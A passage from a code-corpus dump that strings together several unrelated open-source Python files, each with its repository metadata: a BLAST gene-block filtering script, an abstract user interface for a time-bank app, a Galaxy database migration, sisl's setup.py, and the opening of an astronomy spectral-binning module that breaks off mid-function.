    """Greedily pick the smallest set of gene blocks covering every annotation
    found in any neighborhood, then top up with the best singleton genes.

    :param grouped_lists: list of gene-block lists for one organism
    :return: tuple (best_grouping, best_split, best_duplicates) where
             best_grouping is a list of homolog lists, best_split counts the
             splits needed and best_duplicates the duplicated annotations.
    """
    # Step 1: make the grouped lists into a single list of homologs
    org_hlog_list = list(itertools.chain(*grouped_lists))
    neighborhoods_only = [i for i in grouped_lists if len(i) > 1]
    grouped_hlog_list = list(itertools.chain(*neighborhoods_only))
    # Step 2: determine the number of unique genes in both neighborhoods, and the organism.
    # To better explain: I need to know the number of unique genes the organism contains for the gene block.
    # I also need to know the number of unique genes found in neighborhoods.
    number_unique_genes_in_organism = len(make_unique(org_hlog_list, lambda x: x.blast_annotation()))
    number_unique_in_neighborhoods = len(make_unique(grouped_hlog_list, lambda x: x.blast_annotation()))
    '''
    # Debugging. This does check out. kinda interesting stuff though here, there are some inline tandem repeats where gene name is different.
    # Everything looks like it works correctly though
    print org_hlog_list[0].organism(), "number_unique_genes_in_organism", number_unique_genes_in_organism, "number_unique_in_neighborhoods", number_unique_in_neighborhoods
    if number_unique_in_neighborhoods == 1:
        print "neighborhoods_only", neighborhoods_only
        for group in neighborhoods_only:
            for gene in group:
                print gene.blast_annotation(), gene.genbank_annotation(), gene.locus(), gene.start(), gene.stop()
    #print "grouped_lists",grouped_lists
    '''
    # Step 3: greedy algorithm to determine the best neighborhoods to report as a final result
    # NOTE(review): the outer loop terminates because taking every block at
    # once always covers all neighborhood annotations; if grouped_lists had
    # no neighborhoods at all this would loop forever — confirm callers only
    # pass organisms that contain at least one neighborhood.
    optimal = False
    num_in_list = 1 # this is the number of elements per list reurned
    best_duplicates = 0
    splits = number_unique_genes_in_organism - number_unique_in_neighborhoods
    while not optimal:
        # Try every combination of num_in_list blocks; the first size that can
        # cover all neighborhood annotations wins, ties broken by fewest
        # duplicated annotations.
        for group in itertools.combinations(grouped_lists, num_in_list):
            #all_homologs_in_grouping = [item for sublist in group for item in sublist]
            all_homologs_in_grouping = list(itertools.chain(*group))
            #print all_homologs_in_grouping
            #unique_in_set = len(MakeUnique(all_homologs_in_grouping, lambda a: a.predicted_gene))
            unique_in_set = len(make_unique(all_homologs_in_grouping, lambda x: x.blast_annotation()))
            #if unique_in_set == len_unique_grouped: # we have an optimal solution, perhaps not global optima
            if unique_in_set == number_unique_in_neighborhoods: # we have an optimal solution, perhaps not global optima
                duplicates = int(math.fabs(len(all_homologs_in_grouping) - number_unique_in_neighborhoods))
                if not optimal:
                    optimal = True
                    best_grouping = list(group)
                    best_duplicates = duplicates
                    best_split = splits
                elif duplicates < best_duplicates:
                    best_grouping = list(group)
                    best_duplicates = duplicates
        # Each extra block used counts as one more split in the gene block.
        splits+=1
        num_in_list+=1
    #print "splits " , splits, ": best_split ", best_split
    #print "Best grouping as found by the program\n", best_grouping
    # Step 4: determine the best (if necessary) singleton genes to complete
    if number_unique_genes_in_organism != number_unique_in_neighborhoods:
        # This step takes time, so only perform it when you have to
        best_singletons = return_best_singleton_genes(grouped_lists)
        #print "Difference", number_unique_genes_in_organism - number_unique_in_neighborhoods, len(best_singletons)
        #print "singletons", best_singletons , ' '.join([i.blast_annotation() for i in list(itertools.chain(*best_singletons))])
        best_grouping = best_grouping + best_singletons
    return best_grouping, best_split, best_duplicates#, len_unique_grouped
def parallel_filter_operons(arg_tuple):
    """Unfinished multiprocessing worker stub.

    Unpacks its per-file work unit and returns None without doing any work.
    main() builds parallel_list_param for this function but never dispatches
    it through a Pool — presumably a planned parallelization; confirm before
    relying on parallel execution.

    :param arg_tuple: (fname, outfolder, max_gap, e_val)
    """
    fname, outfolder, max_gap, e_val = arg_tuple
def main():
    """Drive the pipeline: parse options, filter each BLAST result file by
    e-value, keep organisms with gene neighborhoods, optimize the reported
    blocks and write one output file per input file.

    NOTE(review): num_proc and parallel_list_param are computed but unused —
    the per-file loop below runs serially despite the multiprocessing import.
    """
    start = time.time()
    parsed_args = parser_code()
    infolder, outfolder, filter_file, num_proc, e_val, max_gap = check_options(parsed_args)
    print infolder, outfolder, filter_file, num_proc, e_val, max_gap
    file_list = return_file_list(infolder, filter_file)
    parallel_list_param = [(i, outfolder, max_gap, e_val) for i in file_list]
    for fname in file_list:
        print fname
        hlog_list = filter_eval(fname, e_val)
        # here we return two dictionaries that are keyed by org, and contain at least one gene block. Orgs without gene blocks are omitted.
        neighborhood_dict, org_dict = return_valid_organism_homologs(hlog_list, max_gap)
        # open a file handle to the output
        head, tail = os.path.split(fname)
        outfile = outfolder + tail
        handle = open(outfile, 'w')
        # Save the result, in the result folder, just like the good little program you are.
        for org in sorted(neighborhood_dict.keys()):
            best_grouping, best_split, best_duplicates = optimize_neighborhoods(neighborhood_dict[org])
            # Flatten the chosen blocks and write them ordered by start coordinate.
            grouping_list = sorted(list(itertools.chain(*best_grouping)), key=lambda x: x.start())
            handle.write('\n'.join([i.to_file() for i in grouping_list])+'\n')
        handle.close()
    # Report total wall-clock runtime in seconds.
    print time.time() - start
# ./filter_operon_blast_results.py -f phylo_order.txt
if __name__ == '__main__':
    main()
| reamdc1/gene_block_evolution | filter_operon_blast_results.py | Python | gpl-3.0 | 20,438 | [
"BLAST"
] | d7afd2ecbb1c2554aa3e60e2eb5556620d51303f30682d181da5e987b34cede7 |
import abc
class User(object):
    """Abstract interface describing every action a user of the application
    can attempt: job management, time/money transfers, branch administration
    and favorites.  Concrete user roles subclass this and implement (or
    deliberately refuse) each operation.

    NOTE(review): only some methods carry @abc.abstractmethod; the
    undecorated ones default to returning None when not overridden —
    confirm this asymmetry is intentional.
    """
    # Python 2-style metaclass declaration; ignored under Python 3.
    __metaclass__ = abc.ABCMeta
    @abc.abstractmethod
    def delete(self):
        """
        :return: True if this user has successfully been deleted
        """
        return
    @abc.abstractmethod
    def is_job_visible(self, job, db_member):
        """
        :param job:
        :param db_member:
        :return: True if the job created by the member is visible
        """
        return
    @abc.abstractmethod
    def see_job_details(self, job_number, job_creator_mail):
        """
        :param job_number: id of the job to return
        :param job_creator_mail: the email of the 'owner' of the job
        :return: the instance of Job object represented by the 'job_number' if the user can see it
            otherwise, it returns None
        """
        return
    @abc.abstractmethod
    def get_visible_job_list(self, show_demands):
        """
        :param show_demands: the type of the list of the jobs to return
        :return: the list of Job objects visible by the user
            (demands if 'show_demands' is true and otherwise the offers)
        """
        return
    @abc.abstractmethod
    def get_involved_job_list(self, show_offers):
        """
        :param show_offers: the type of the list of the jobs to return
        :return: the list of Job objects in which the user is involved
            (offers if 'show_offers' is true and otherwise the demands)
        """
        return
    @abc.abstractmethod
    def accept_job(self, job_number, job_creator_mail):
        """
        Puts the member on the list of possible helpers for a pending job.
        The helped one will be warned by email (this email is the parameter 'job_creator_mail').
        :param job_number: the if of the job to accept
        :param job_creator_mail: the email of the 'owner' of the job
        :return: False if there was a problem and True otherwise
        """
        return
    @abc.abstractmethod
    def stop_participate_job(self, job_number, job_creator_mail):
        """
        Remove the member on the list of possible helpers for a pending job.
        :param job_number: the if of the job to accept
        :param job_creator_mail: the email of the 'owner' of the job
        :return: False if there was a problem and True otherwise
        """
        return
    @abc.abstractmethod
    def register_job_done(self, job_number, job_creator_mail, helped_one_email=None, new_time=0):
        """
        Registers a job as done (with the new time to put).
        The helped one will be warned by email and will be able to accept the 'payment' or not
        :param job_number: it's the number of the job created by the job_creator_mail
        :param job_creator_mail: The mail of the creator of the job
        :param helped_one_email: it can't be None
        :param new_time:
        :return: False if there was a problem and True otherwise.
        """
        return
    def accept_help(self, job_number, job_creator_mail, helper_email):
        """
        Chooses the member (with email stored in 'helper_email') to do the job (with id stored in 'number')
        The chosen helper is warned by email
        :param job_number: it's the number of the job created by the job_creator_mail
        :param job_creator_mail: The mail of the creator of the job
        :param helper_email:
        :return: False if there was a problem and True otherwise
        """
        return
    @abc.abstractmethod
    def create_job(self, branch_name, title, description, is_demand, frequency, category, visibility,
                   date='', start_time='', km=0, duration='', other_category='', place='', recursive_day=''):
        """
        Creates a help offer (the parameters will be used to fill the database).
        :param branch_name: The branch to which belongs the job
        :param date: The date of the job
        :param is_demand: True if it's a demand, false otherwise
        :param start_time: The hour of the beginning of the job in minute. Example : 14h30 -> 14*60+30 = 870
        :param frequency: The frequency of the job. (0=Once, 1=daily, 2=weekly, ...)
        :param km: The number of km to do the job
        :param duration: The job's duration approximation
        :param category: The category of the job. (1=shopping, 2=visit, 3=transport)
        :param place: A description of the job's location
        :param visibility: Which people can see the job.
        :return: False if there was a problem and True otherwise.
        """
        return
    @abc.abstractmethod
    def delete_job(self, job_number):
        """
        Delete the job of the user with the number 'job_number'
        :param job_number: The number of the job of the user to delete.
        """
        return
    def accept_bill(self, job_number, job_creator_mail, amount):
        """
        Accepts the bill and transfers money to the helper
        :param job_number: it's the number of the job created by the job_creator_mail
        :param job_creator_mail: The mail of the creator of the job
        :param amount: amount of the bill
        :return: False if there was a problem and True otherwise.
        """
        return
    def refuse_bill(self, job_number, job_creator_mail):
        """
        Refuses the bill and warns the branch officer by email
        :param job_number: it's the number of the job created by the job_creator_mail
        :param job_creator_mail: The mail of the creator of the job
        :return: False if there was a problem and True otherwise.
        """
        return
    def transfer_time(self, destination_email, time, message):
        """
        Transfers 'time' to a member with 'destination_email' as email
        :param destination_email: the email address of the member to transfer time
        :return: False if there was a problem and True otherwise.
        """
        return
    def make_donation(self, time, message, branch_name=None):
        """
        Makes a donation to the branch of the member
        :param branch_name:
        :param time:
        :return:
        """
        return
    def delete_member_from_branch(self, branch_name, deleted_one_email):
        """
        Delete the member from the branch
        :param branch_name: The name of the branch that the branch_officer belongs to
        :param deleted_one_email: The mail of the member the branch_officer want to remove from
            the branch.
        :return: False if there was a problem and True otherwise.
        """
        return
    def delete_member_from_site(self, deleted_one_email):
        """
        Put the status of the member as deleted (TODO add a deleted field to member ?)
        :param deleted_one_email: the email of the person to delete
        :return: False if there was a problem and True otherwise.
        """
        return
    def log_as_member(self, email, session):
        """
        Logs the current user as the one specified by the email (by modifying the session variables)
        :param email: the email of the member to log in as
        :param session: the dictionary containing the session variables
        :return: False if there was a problem and True otherwise.
        """
        return
    def give_branch_control(self, branch_name, new_branch_officer_email):
        """
        Set the control of a branch to an another branch_officer, which is represented by his mail
        :param branch_name: the name of the branch that will change of the branch_officer
        :param new_branch_officer_email: the new branch_officer that will control the branch
        :return: False if there was a problem and True otherwise.
        """
        return
    def modify_tag_member(self, email, new_tag):
        """
        Modify the tag of the member represented by the email,
        and set his tag to the new_tag
        :param email: mail of the member we need to modify the tag
        :param new_tag: new tag to assign to the member
        :return: False if there was a problem and True otherwise.
        """
        return
    def transfer_money_from_branch(self, time, branch_name, destination_email):
        """
        Make a gift by taking some time from the branch to the member represented
        by the destination_email.
        :param time: the amount of time that we give as a gift
        :param branch_name: the branch that give the donation
        :param destination_email: the member that receive the donation
        :return: False if there was a problem and True otherwise.
        """
        return
    def create_branch(self, name, branch_town, branch_officer_email=None, street='', zip='', town=''):
        """
        Create a new branch with the parameter
        :param name: name of the new branch
        :param town: town of the new branch
        :param branch_officer_email: mail of the branch_officer that will manage the branch
        :param address: address of the branch, for meeting, or other
        :return: False if there was a problem and True otherwise.
        """
        return
    def remove_branch(self, branch_name):
        """
        Remove a branch from the application
        :param branch_name: the name of the branch to remove
        :return: False if there was a problem and True otherwise.
        """
        return
    def transfer_bp_admin_rights(self, new_bp_admin_email):
        """
        The bp admin abandon his rights, and give them to someone else.
        :param new_bp_admin_email:
        :return: False if there was a problem and True otherwise.
        """
        return
    def add_favorite(self, favorite_mail):
        """
        Add a favorite to self
        :param favorite_mail : the mail of the favorite
        :return : false if the member is not added to favorites (because it doesn't exist for example)
        """
        return
    def remove_favorite(self, favorite_mail):
        """
        Remove a favorite to self
        :param favorite_mail : the mail of the favorite
        :return : false if the member is not removed from favorites (because it doesn't exist for example)
        """
        return
    @abc.abstractmethod
    def is_member_visible(self, member):
        """
        :param member:
        :return: True if the member is visible for the current user and False otherwise
        """
        return
    @abc.abstractmethod
    def get_visible_members(self, branch):
        """
        :param branch: if it is not None, it gets only the members that are in a specific branch
        :return: the list of the visible members (of the branch specified if the parameter is not set to None)
        """
        return
    @abc.abstractmethod
    def change_status(self, active):
        """
        :param active
        :return: True
        """
        return
    def is_branch_officer(self, member):
        """
        :param member:
        :return: True if the current user is the branch officer of the member
        """
        return
"VisIt"
] | ca12f763401985ef6ce760caab51c1b4746349f36bb652d8a5d4c39d2de74506 |
"""
Migration script to alter the type of the tool_dependency.version column from TrimmedString(40) to Text.
"""
from sqlalchemy import *
from sqlalchemy.orm import *
from migrate import *
from migrate.changeset import *
import datetime
# Shorthand used by migration scripts for "current UTC timestamp" defaults.
now = datetime.datetime.utcnow
# Need our custom types, but don't import anything else from model
from galaxy.model.custom_types import *
import sys, logging
# Per-module logger writing DEBUG-and-above messages to stdout.
log = logging.getLogger( __name__ )
log.setLevel(logging.DEBUG)
handler = logging.StreamHandler( sys.stdout )
# NOTE(review): 'format' shadows the builtin of the same name; harmless here
# since it is only used on the next line.
format = "%(name)s %(levelname)s %(asctime)s %(message)s"
formatter = logging.Formatter( format )
handler.setFormatter( formatter )
log.addHandler( handler )
# Shared MetaData instance bound to the engine inside upgrade()/downgrade().
metadata = MetaData()
def upgrade(migrate_engine):
    """Widen the tool_dependency.version column to Text.

    Issues dialect-specific ALTER TABLE statements for PostgreSQL and MySQL;
    SQLite requires no change (see the storage-class notes below).  Failures
    are logged rather than raised so the migration run can continue.
    """
    metadata.bind = migrate_engine
    print __doc__
    metadata.reflect()
    # NOTE(review): the reflected table object is unused afterwards; the
    # ALTER is issued as raw SQL below — presumably the reflection is only a
    # sanity check that the table exists.
    ToolDependency_table = Table( "tool_dependency", metadata, autoload=True )
    # Change the tool_dependency table's version column from TrimmedString to Text.
    if migrate_engine.name in ['postgresql', 'postgres']:
        cmd = "ALTER TABLE tool_dependency ALTER COLUMN version TYPE Text;"
    elif migrate_engine.name == 'mysql':
        cmd = "ALTER TABLE tool_dependency MODIFY COLUMN version Text;"
    else:
        # We don't have to do anything for sqlite tables. From the sqlite documentation at http://sqlite.org/datatype3.html:
        # 1.0 Storage Classes and Datatypes
        # Each value stored in an SQLite database (or manipulated by the database engine) has one of the following storage classes:
        # NULL. The value is a NULL value.
        # INTEGER. The value is a signed integer, stored in 1, 2, 3, 4, 6, or 8 bytes depending on the magnitude of the value.
        # REAL. The value is a floating point value, stored as an 8-byte IEEE floating point number.
        # TEXT. The value is a text string, stored using the database encoding (UTF-8, UTF-16BE or UTF-16LE).
        # BLOB. The value is a blob of data, stored exactly as it was input.
        cmd = None
    if cmd:
        try:
            migrate_engine.execute( cmd )
        # Python 2 except syntax; errors are swallowed after logging so a
        # failed ALTER does not abort the whole migration chain.
        except Exception, e:
            log.debug( "Altering tool_dependency.version column from TrimmedString(40) to Text failed: %s" % str( e ) )
def downgrade(migrate_engine):
    """No-op downgrade.

    Shrinking the column back from Text to TrimmedString(40) is not
    required, so only the shared metadata is re-bound to the engine.
    """
    metadata.bind = migrate_engine
| mikel-egana-aranguren/SADI-Galaxy-Docker | galaxy-dist/lib/galaxy/model/migrate/versions/0100_alter_tool_dependency_table_version_column.py | Python | gpl-3.0 | 2,354 | [
"Galaxy"
] | 874357bbbd552666e22a15ea4b688ce9bce37749e88a3a13e43088e3397d355f |
#!/usr/bin/env python3
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at https://mozilla.org/MPL/2.0/.
"""
Manipulating of DFT output, geometries and creating tight-binding parameter sets for NEGF transport
"""
# We have used a paradigm following pandas and Cython web-page documentation.
# __doc__ is None when the interpreter strips docstrings (python -OO);
# rebuild it so DOCLINES below always has content.
if __doc__ is None:
    __doc__ = """Manipulating of DFT output, geometries and creating tight-binding parameter sets for NEGF transport"""
DOCLINES = __doc__.split("\n")
import sys
import multiprocessing
import os
# pkg_resources is part of setuptools
import pkg_resources
# We should *always* import setuptools prior to Cython/distutils
import setuptools
def _ospath(path):
    """Convert a '/'-separated path into the native separator convention.

    Intended for the relative source paths listed in this file; an absolute
    POSIX path would lose its leading slash through os.path.join.
    """
    segments = path.split('/')
    return os.path.join(*segments)
# Macros for use when compiling stuff
# (name, value) pairs eventually passed to the C compiler as defines.
macros = []
try:
    import Cython
    # if available we can cythonize stuff
    _CYTHON_VERSION = Cython.__version__
    from Cython.Build import cythonize
    # We currently do not have any restrictions on Cython (I think?)
    # If so, simply put it here, and we will not use it
    _CYTHON_INSTALLED = True
except ImportError:
    _CYTHON_VERSION = None
    _CYTHON_INSTALLED = False
    # Identity fallback so later cythonize(...) calls are harmless no-ops.
    cythonize = lambda x, *args, **kwargs: x # dummy func
if _CYTHON_INSTALLED:
    # The import of Extension must be after the import of Cython, otherwise
    # we do not get the appropriately patched class.
    # See https://cython.readthedocs.io/en/latest/src/userguide/source_files_and_compilation.html
    # Now we can import cython distutils
    from Cython.Distutils.old_build_ext import old_build_ext as cython_build_ext
    cython = True
else:
    cython = False
# Allow users to remove cython step (forcefully)
# This may break compilation, but at least users should be aware
if "--no-cythonize" in sys.argv:
    sys.argv.remove("--no-cythonize")
    cython = False
# Check if users requests coverage of Cython sources
if "--with-cython-coverage" in sys.argv:
    linetrace = True
    sys.argv.remove("--with-cython-coverage")
else:
    linetrace = False
# Define Cython directives
# We shouldn't rely on sources having the headers filled
# with directives.
# Cleaner to have them here, and possibly on a per file
# basis (if needed).
# That could easily be added at ext_cython place
directives = {"linetrace": False, "language_level": 3}
if linetrace:
    # https://pypkg.com/pypi/pytest-cython/f/tests/example-project/setup.py
    # Coverage tracing needs both the directive and the C-level macros.
    directives["linetrace"] = True
    directives["emit_code_comments"] = True
    macros.extend([("CYTHON_TRACE", "1"), ("CYTHON_TRACE_NOGIL", "1")])
# Check if users requests checking fortran passing copies
if "--f2py-report-copy" in sys.argv:
    macros.append(("F2PY_REPORT_ON_ARRAY_COPY", "1"))
    sys.argv.remove("--f2py-report-copy")
# We will *only* use setuptools
# Although setuptools is not shipped with the standard library, I think
# this is ok since it should get installed pretty easily.
from setuptools import Command, Extension
from setuptools import find_packages, find_namespace_packages
# Patch to allow fortran sources in setup
# build_ext requires numpy setup
# Also for extending build schemes we require build_ext from numpy.distutils
from distutils.command.sdist import sdist
from numpy.distutils.command.build_ext import build_ext as numpy_build_ext
from numpy.distutils.core import Extension as FortranExtension
from numpy.distutils.core import setup
from numpy import __version__ as np_version
print(f"sisl-build: numpy.__version__ = {np_version}")
# Without Cython the numpy build_ext serves as the (only) extension builder.
if not cython:
    cython_build_ext = numpy_build_ext
# Custom command classes
# Registry handed to setup(cmdclass=...); filled in further below.
cmdclass = {}
# Now create the build extensions
class CythonCommand(cython_build_ext):
    """
    Custom distutils command subclassed from Cython.Distutils.build_ext
    to compile pyx->c, and stop there. All this does is override the
    C-compile method build_extension() with a no-op.
    """
    def build_extension(self, ext):
        # Intentionally empty: the inherited command has already converted
        # .pyx -> .c by this point, and C compilation is left to the regular
        # build_ext command.
        pass
# Pick which source suffix the Extension objects will reference: .pyx when
# Cython can regenerate C sources, the pre-generated .c files otherwise.
if cython:
    # we have cython and generate c codes directly
    suffix = ".pyx"
    cmdclass["cython"] = CythonCommand
else:
    suffix = ".c"
# Retrieve the compiler information
from numpy.distutils.system_info import get_info
# use flags defined in numpy
all_info = get_info('ALL')
# Define compilation flags
extra_compile_args = ""
extra_link_args = extra_compile_args
# in numpy>=1.16.0, silence build warnings about deprecated API usage
macros.append(("NPY_NO_DEPRECATED_API", "0"))
# Do not expose multiple platform Cython code.
# We do not need it
# https://cython.readthedocs.io/en/latest/src/userguide/source_files_and_compilation.html#integrating-multiple-modules
macros.append(("CYTHON_NO_PYINIT_EXPORT", "1"))
class EnsureSource_sdist(sdist):
    """Ensure Cython has runned on all pyx files (i.e. we need c sources).

    With Cython available the ``cython`` sub-command regenerates every C
    source; without it, every pre-generated ``.c`` file must already be
    present next to its ``.pyx`` file or the sdist is aborted.
    """

    def run(self):
        if "cython" in cmdclass:
            # Cython is available: (re)generate all C sources first.
            self.run_command("cython")
        else:
            # No Cython: verify the shipped C sources exist.
            for ext, ext_d in ext_cython.items():
                pyx = ext_d.get("pyxfile", f"{ext}.pyx")
                source = f"{pyx[:-4]}.c"
                # BUG FIX: the second line was missing the f-prefix, so
                # "{pyx}" and "{source}" appeared literally in the message.
                msg = (f".c-source file '{source}' not found.\n"
                       f"Run 'setup.py cython' to convert {pyx} to {source} before sdist."
                       )
                assert os.path.isfile(source), msg
        super().run()
cmdclass["sdist"] = EnsureSource_sdist
# Cython extensions can't be merged as a single module
# It requires a single source file.
# In this scheme all modules are named the same as their pyx files.
# If the module name should change, simply manually put the pyxfile.
# Optional keys per module: "pyxfile", "sources", "depends", "include",
# "language", "macros" (consumed by the Extension() loop below).
# `_ospath` is defined earlier in the file -- presumably it normalizes
# '/'-separated paths to the host separator.
ext_cython = {
    "sisl._indices": {},
    "sisl._math_small": {},
    "sisl._sparse": {
        "depends": [_ospath("sisl/_indices.pxd")]
    },
    "sisl._supercell": {},
    "sisl.physics._bloch": {},
    "sisl.physics._phase": {},
    "sisl.physics._matrix_utils": {},
    "sisl.physics._matrix_k": {},
    "sisl.physics._matrix_dk": {},
    "sisl.physics._matrix_ddk": {},
    "sisl.physics._matrix_phase3": {},
    "sisl.physics._matrix_phase3_nc": {},
    "sisl.physics._matrix_phase3_so": {},
    "sisl.physics._matrix_phase": {},
    "sisl.physics._matrix_phase_nc_diag": {},
    "sisl.physics._matrix_phase_nc": {},
    "sisl.physics._matrix_phase_so": {},
    "sisl.physics._matrix_sc_phase": {
        "depends": [_ospath("sisl/_sparse.pxd")]
    },
    "sisl.physics._matrix_sc_phase_nc_diag": {
        "depends": [_ospath("sisl/_sparse.pxd"),
                    _ospath("sisl/physics/_matrix_utils.pxd")
                    ]
    },
    "sisl.physics._matrix_sc_phase_nc": {
        "depends": [_ospath("sisl/_sparse.pxd"),
                    _ospath("sisl/physics/_matrix_utils.pxd")
                    ]
    },
    "sisl.physics._matrix_sc_phase_so": {
        "depends": [_ospath("sisl/_sparse.pxd"),
                    _ospath("sisl/physics/_matrix_utils.pxd")
                    ]
    },
}
# List of extensions for setup(...)
extensions = []
for mod_name, mod_data in ext_cython.items():
    # Default pyx file is the module name itself; convert the dotted module
    # path to a file-system path.  This also mangles the ".pyx" dot, which
    # the [:-4] slice below undoes before the suffix is appended.
    pyx_path = mod_data.get("pyxfile", f"{mod_name}.pyx").replace(".", os.path.sep)
    ext = Extension(
        mod_name,
        sources=[f"{pyx_path[:-4]}{suffix}"] + mod_data.get("sources", []),
        depends=mod_data.get("depends", []),
        include_dirs=mod_data.get("include", []),
        language=mod_data.get("language", "c"),
        define_macros=macros + mod_data.get("macros", []),
        extra_compile_args=extra_compile_args,
        extra_link_args=extra_link_args,
    )
    extensions.append(ext)
# Specific Fortran extensions
# Each entry maps a module name to its Fortran source list; compiled with
# numpy.distutils' FortranExtension below.
ext_fortran = {
    "sisl.io.siesta._siesta": {
        "sources": [_ospath(f"sisl/io/siesta/_src/{f}") for f in
                    ["io_m.f90",
                     "siesta_sc_off.f90",
                     "hsx_read.f90", "hsx_write.f90",
                     "dm_read.f90", "dm_write.f90",
                     "tshs_read.f90", "tshs_write.f90",
                     "grid_read.f90", "grid_write.f90",
                     "gf_read.f90", "gf_write.f90",
                     "tsde_read.f90", "tsde_write.f90",
                     "hs_read.f90",
                     "wfsx_read.f90"]
                    ],
    },
}
# Append the Fortran extensions to the same list handed to setup()
for name, data in ext_fortran.items():
    ext = FortranExtension(name,
                           sources=data.get("sources"),
                           depends=data.get("depends", []),
                           include_dirs=data.get("include", None),
                           define_macros=macros + data.get("macros", []),
                           extra_compile_args=extra_compile_args,
                           extra_link_args=extra_link_args,
                           )
    extensions.append(ext)
class EnsureBuildExt(numpy_build_ext):
    """
    Override build-ext to check whether compilable sources are present
    This merely pretty-prints a better error message.
    Note we require build_ext to inherit from numpy.distutils since
    we need fortran sources.
    """

    def check_cython_extensions(self, extensions):
        # Verify every listed source file exists before the compiler runs,
        # so a missing Cython-generated file produces a readable error.
        for ext in extensions:
            for src in ext.sources:
                if not os.path.exists(src):
                    print(f"{ext.name}: -> {ext.sources}")
                    raise Exception(
                        f"""Cython-generated file '{src}' not found.
Cython is required to compile sisl from a development branch.
Please install Cython or download a release package of sisl.
""")

    def build_extensions(self):
        self.check_cython_extensions(self.extensions)
        # Idiom fix: delegate via super() rather than calling the base
        # class explicitly (behavior identical for this single-inheritance).
        super().build_extensions()
# Override build_ext command (typically called by setuptools)
cmdclass["build_ext"] = EnsureBuildExt
# Run cythonizer
def cythonizer(extensions, *args, **kwargs):
    """
    Skip cythonizer (regardless) when running
      * clean
      * sdist

    Otherwise if `cython` is True, we will cythonize sources.
    """
    # Nothing to translate for clean/sdist invocations
    # https://github.com/cython/cython/issues/1495
    if "clean" in sys.argv or "sdist" in sys.argv:
        return extensions
    if not cython:
        raise RuntimeError("Cannot cythonize without Cython installed.")

    import argparse

    # Honor -j/--parallel command-line flags while cythonizing
    parser = argparse.ArgumentParser()
    parser.add_argument("-j", type=int, dest="parallel")
    parser.add_argument("--parallel", type=int, dest="parallel")
    known, _ = parser.parse_known_args()
    if known.parallel:
        kwargs["nthreads"] = max(0, known.parallel)

    # Partition: only the modules listed in ext_cython get cythonized,
    # everything else (e.g. Fortran extensions) passes through untouched.
    to_cythonize = [e for e in extensions if e.name in ext_cython]
    passthrough = [e for e in extensions if e.name not in ext_cython]
    return passthrough + cythonize(to_cythonize, *args, quiet=False, **kwargs)
# This will locate all sisl* packages
packages = find_packages()
# This requires some name-mangling provided by 'package_dir' option
# Using namespace packages allows others to provide exactly the same package
# without causing namespace problems.
packages += map(lambda x: f"sisl_toolbox.{x}", find_namespace_packages(where="toolbox"))
# Please update MANIFEST.in file for stuff to be shipped in the distribution.
# Otherwise we should use package_data to ensure it gets installed.
package_data = {p: ["*.pxd"] for p in packages}
package_data["sisl_toolbox.siesta.minimizer"] = ["*.yaml"]
# NOTE: name/version/etc. are presumably merged into `metadata` elsewhere
# in the file (outside this view); here only the build-related keys are set.
metadata = dict(
    # Correct the cmdclass
    cmdclass=cmdclass,
    # Ensure the packages are being found in the correct locations
    package_dir={"sisl_toolbox": "toolbox"},
    # This forces MANIFEST.in usage
    include_package_data=True,
    package_data=package_data,
    packages=packages,
    ext_modules=cythonizer(extensions, compiler_directives=directives),
)
cwd = os.path.abspath(os.path.dirname(__file__))
# PKG-INFO exists only in an unpacked source release
if not os.path.exists(_ospath(cwd + "/PKG-INFO")):
    # Generate Cython sources, unless building from source release
    # generate_cython()
    pass
if __name__ == "__main__":
    # Freeze to support parallel compilation when using spawn instead of fork
    multiprocessing.freeze_support()
    setup(**metadata)
| zerothi/sisl | setup.py | Python | mpl-2.0 | 12,319 | [
"SIESTA"
] | 387df997096a41c0df48b22d57400e226ca22b2040df0a463636d5be1dc009b3 |
"""
__license__ = "MIT"
__author__ = "Guangtun Ben Zhu (BGT) @ Johns Hopkins University"
__startdate__ = "2016.01.27"
__name__ = "cnn"
__module__ = "Network"
__lastdate__ = "2016.01.27"
__version__ = "0.01"
"""
# Python 2 to 3
from os.path import isfile, join
import numpy as np
from scipy.stats import nanmean, nanmedian
import fitsio
import lmfit
import datapath
import allinonespec as aio
import sdssspec as sdssspec
import cosmology as cosmo
# Small positive number used as an effective zero for bin lower edges
_EPS = 1E-5
# prefixes
_allinone_observer_bands = ['OPTICAL']
_allinone_rest_bands = ['NUV', 'OPTICAL', 'NIR']
_allinone_observer_fileprefix = 'AIO_ELG_eBOSS_ObserverFrame_'
_allinone_rest_fileprefix = 'AIO_ELG_eBOSS_SDSSRestFrame_'
_elgfile = 'spAll-ELG-v5.4-zQ.fits'
_compositefile = 'feiimgii_composite.fits'
_bootstrap_compositefile = 'feiimgii_composite_bootstrap.fits'
# Number of bootstrap resamplings for the composite spectra
_nbootstrap = 100
# Observer-frame wavelength coverage (Angstrom) of the spectrograph
_minmaxwave = [3600., 10400.]
# Rest-frame continuum windows (Angstrom); edges are offset from line
# centers (e.g. FeII/MgII features) to exclude the lines themselves.
_contmask = np.array([[2200., 2249.88-7.],
                      [2260.78+6., 2297.58-10.],
                      [2297.58+6., 2324.21-7.],
                      [2344.21+6., 2365.36-7.],
                      [2396.36+6., 2422.56-7.],
                      [2425.14+6., 2470.97-7.],
                      [2471.09+6., 2510.00-7.],
                      [2511.00+6., 2576.88-7.],
                      [2626.45+6., 2796.35-7.],
                      [2803.53+6., 2852.96-7.],
                      [2852.96+6., 2900.]])
# Continuum windows used around [OII]
_oiimask = np.array([[3100., 3189.67-7.],
                     [3189.67+7., 3700.]])
# Continuum windows used around [OIII]
#_o3mask = np.array([[4750., 4863.-13.],
_o3mask = np.array([[4920, 4959.-7.],
                    [4959.+6., 5007.-7.],
                    [5007.+7., 5040.]])
# Default redshift selection window
_zmin = 0.6
_zmax = 1.2
_zcorr = 10./3.E5 # redshift correction, 10 km/s
# 2/3/4/5 bins
def make_oiiewbins(zmin=_zmin, zmax=_zmax):
    """Define the [OII] equivalent-width and luminosity bins.

    Four binning schemes with 2, 3, 4 and 5 bins are concatenated into
    flat arrays of 2+3+4+5 = 14 entries.  For every bin the representative
    value is the median over the selected good galaxies.

    Parameters
    ----------
    zmin, zmax : float
        Redshift window for selecting objects (together with zGOOD==1 and
        CLASS=='GALAXY') whose medians are computed.

    Returns
    -------
    tuple of ndarray
        (oiiewmin, oiiewmax, oiiewbin, oiilummin, oiilummax, oiilumbin):
        lower edges, upper edges and per-bin medians of the [OII] EW and
        of log10([OII] luminosity).
    """
    nbin = 2+3+4+5
